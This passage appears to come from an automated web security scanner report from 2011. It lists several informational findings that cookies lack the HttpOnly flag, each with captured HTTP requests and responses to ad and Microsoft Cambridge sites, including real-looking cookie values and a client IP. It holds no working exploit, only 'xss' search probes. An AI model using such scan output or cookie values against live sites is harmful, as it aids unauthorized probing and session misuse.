Set-Cookie: traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=a1743495-9530-4d25-a9ca-bb977519280d&referringdomain=&split=13; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97068


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="https:/
...[SNIP]...

11.29. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc4JnRsPTE1NzY4MDA=&piggybackCookie=uid:6422714091563403120 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/index.php?status=A&pshort=Y&pfull=Y&pname=Y&pkeywords=Y&search_performed=Y&cid=0&q=xss&x=0&y=0&dispatch=products.search&features_hash=P14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:23:54 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834; domain=pubmatic.com; expires=Wed, 03-Sep-2014 00:23:54 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

11.30. http://microsoftcambridge.com/Portals/0/app_v_feat.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/app_v_feat.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/0/app_v_feat.jpg HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Date: Sat, 03 Sep 2011 13:42:34 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=6C7CC4F5569112C2183A9F0A7D693744; path=/
Last-Modified: Fri, 12 Mar 2010 19:45:48 GMT
X-Cache-Info: caching
Content-Length: 10482

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

11.31. http://microsoftcambridge.com/Portals/0/portal.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/portal.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/0/portal.css HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/css
Date: Sat, 03 Sep 2011 13:42:30 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=71FAA04E625539F426900B9F2AF66B9D; path=/
Last-Modified: Tue, 24 Mar 2009 15:35:27 GMT
X-Cache-Info: caching
Content-Length: 2



11.32. http://microsoftcambridge.com/Portals/0/rss.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/rss.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/0/rss.png HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Date: Sat, 03 Sep 2011 13:42:34 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=A3C0DAFD2501960491DB6D8BB4AF78CD; path=/
Last-Modified: Fri, 26 Jun 2009 18:39:17 GMT
X-Cache-Info: caching
Content-Length: 3024

.PNG
.
...IHDR.............s+....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.33. http://microsoftcambridge.com/Portals/0/search_results.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/search_results.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/0/search_results.png HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Date: Sat, 03 Sep 2011 13:42:34 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=6E444C5C9EE5F0B36535D0D071AE8DCE; path=/
Last-Modified: Fri, 20 Feb 2009 03:31:18 GMT
X-Cache-Info: caching
Content-Length: 5556

.PNG
.
...IHDR...O...!.....YD)l....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.34. http://microsoftcambridge.com/Portals/0/share_icons_new.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/0/share_icons_new.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/0/share_icons_new.png HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Date: Sat, 03 Sep 2011 13:42:34 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=DF1FA1E49AC6733F28ECBEF98F896ADD; path=/
Last-Modified: Mon, 28 Mar 2011 17:48:29 GMT
X-Cache-Info: caching
Content-Length: 7108

.PNG
.
...IHDR..............;......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.35. http://microsoftcambridge.com/Portals/_default/Skins/working/skin.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/_default/Skins/working/skin.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/_default/Skins/working/skin.css HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/css
Date: Sat, 03 Sep 2011 13:42:30 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=A2D3773D35D890AA5A909771E7CC5C9D; path=/
Last-Modified: Fri, 18 Feb 2011 14:35:44 GMT
X-Cache-Info: caching
Content-Length: 2593

body
{
   background-color: #9a825e;
   background-image: url(/img/microsoft_work_bg.jpg);
   color: #30302e;
}

.header
{
   border-bottom: 4px #4d9f8e solid;
}

.content
{
}

.bottom
{
   background-image: ur
...[SNIP]...

11.36. http://microsoftcambridge.com/Portals/_default/default.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Portals/_default/default.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/_default/default.css HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/css
Date: Sat, 03 Sep 2011 13:42:30 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=0817D9D7E6BBB58F474E097C28605B0C; path=/
Last-Modified: Fri, 18 Feb 2011 14:26:56 GMT
X-Cache-Info: caching
Content-Length: 12186

.../* background color for the content part of the pages */
.ControlPanel, .PagingTable{width:100%;background-color:#fff;border:#036 1px solid;}
.SkinObject{font-weight:bold;font-size:8.5pt;color:#036
...[SNIP]...

11.37. http://microsoftcambridge.com/Resources/Shared/scripts/initWidgets.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /Resources/Shared/scripts/initWidgets.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Resources/Shared/scripts/initWidgets.js HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: application/x-javascript
Date: Sat, 03 Sep 2011 13:42:32 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=F896E78C0F7F2B25089E63BE014483C0; path=/
Last-Modified: Thu, 17 Feb 2011 20:35:56 GMT
X-Cache-Info: caching
Content-Length: 1311

function loadWidgets()
{
if (typeof (DotNetNuke) === "undefined")
Type.registerNamespace("DotNetNuke.UI.WebControls");

if (typeof (DotNetNuke.UI.WebControls.Utility) === "undefin
...[SNIP]...

11.38. http://microsoftcambridge.com/css/print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /css/print.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/print.css HTTP/1.1
Host: microsoftcambridge.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Search/tabid/722/Default.aspx?search=xss
Cookie: .ASPXANONYMOUS=naxzKdGgzAEkAAAAMWZkNjFhNTgtODE2OC00YmYwLTgxOTItNTRiMmJkNjRjNzEz0; language=en-US; X-Mapping-pfddgonl=A3596D31FEF096F6D024754A472DF1B8

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/css
Date: Sat, 03 Sep 2011 13:42:30 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-nbhajkek=F896E78C0F7F2B25089E63BE0